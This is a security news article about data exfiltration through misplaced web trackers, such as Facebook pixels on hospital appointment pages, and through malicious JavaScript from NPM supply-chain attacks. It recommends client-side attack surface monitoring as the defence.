O NXcpINslv vK xH UHEZ

Security Experts Warn of Two Primary Client-Side Risks Associated with Data Exfiltration and Loss

Two client-side risks dominate the problems with data loss and data exfiltration: improperly placed trackers on websites and web applications and malicious client-side code pulled from third-party repositories like NPM.

Client-side security researchers are finding that improperly placed trackers, while not intentionally malicious, are a growing problem and have clear and significant privacy implications when it comes to both compliance/regulatory concerns, like HIPAA or PCI DSS 4.0. To highlight the risks with misplaced trackers, a recent study by The Markup (a non-profit news organization) examined Newsweek’s top 100 hospitals in America. They found a Facebook tracker on one-third of the hospital websites which sent Facebook highly personal healthcare data whenever the user clicked the “schedule appointment” button. The data was not necessarily anonymized, because the data was connected to an IP address, and both the IP address and the appointment information get delivered to Facebook.

Journalists and client-side security researchers aren’t the only ones looking at data privacy issues. Last week, the FTC announced its plans to crack down on tech companies’ improper or illegal use and sharing of highly sensitive data. The FTC indicated they also plan to target false claims about data anonymization. The government agency points out that sensitive health information combined with the shadowy data security practices used by technology companies is extremely problematic, with most customers having little or no knowledge of how their data is collected, what data is collected, how it is used, or how it is protected.

The security industry has repeatedly proven how easy it is to re-identify anonymized data by combining several datasets to create a clear picture of the end user’s identity.

In addition to improperly placed web trackers, client-side security researchers are warning about the risks associated with JavaScript code pulled from third-party repositories, like NPM. Recent research found that package managers containing obfuscated and malicious JavaScript was being used to harvest sensitive information from websites and web applications. Using sources like NPM, malicious threat actors target organizations via a JavaScript software supply chain attack using rogue components to exfiltrate data entered into forms by users on websites that include this malicious code.

Client-side security researchers advise several approaches for identifying and mitigating these two primary risks. Client-side attack surface monitoring is the most comprehensive and fully protects end users and businesses from the risk of data theft due to Magecart, e-skimming, cross-site scripting, and JavaScript injection attacks. Other tools, like web application firewalls (WAFs), protect some aspects of the client-side attack surface but fail to protect activities happening on dynamic web pages. Content security policies (CSPs) are another good client-side security tool, but CSPs are cumbersome. Manual code reviews to identify problems with CSPs can mean long hours (or days) scouring through thousands of lines of web application script.

Security professionals can also explore client-side attack surface mapping solutions that incorporate threat intelligence, access insights (which assets are accessing what data), and privacy (is any of the data being shared to external sources inappropriately).

Client-side attack surface monitoring solutions are a relatively new cybersecurity technology that automatically discovers all of a company’s web assets and reports on their data access. These solutions use headless browsers to navigate through all the JavaScript contained on the website and web application pages. They gather real-time information about how the scanned website works from the end user’s perspective.

A key technological component in client-side attack surface monitoring solutions are synthetic users, deployed during threat detection crawls to interact the way a real human would on dynamic web pages. These synthetic users can complete a variety of activities, including clicking active links, submitting forms, solving Captchas, and entering financial information. Synthetic user interaction is logged and monitored, followed by behavioral analyses and logic injection into each page to gather the information that is difficult to collect manually, including form data, the data third-party scripts have access to, trackers that are deployed and their activities, and any forms or third-party scripts transferring data across national boundaries.

Solutions should also be able to operationalize any issues discovered in the identification or client-side mapping process through the use of allowlists and blocklists and through post-scan informational analyses to obtain synthesized intelligence to secure web applications from harm.

Security professionals with expertise on the client side are strongly advising organizations in industries such as financial services, media/entertainment, e-commerce, healthcare, and technology/SaaS that have multiple front-end web applications to understand client-side security and how client-side risks may impact their business.

Related Articles

Back to top button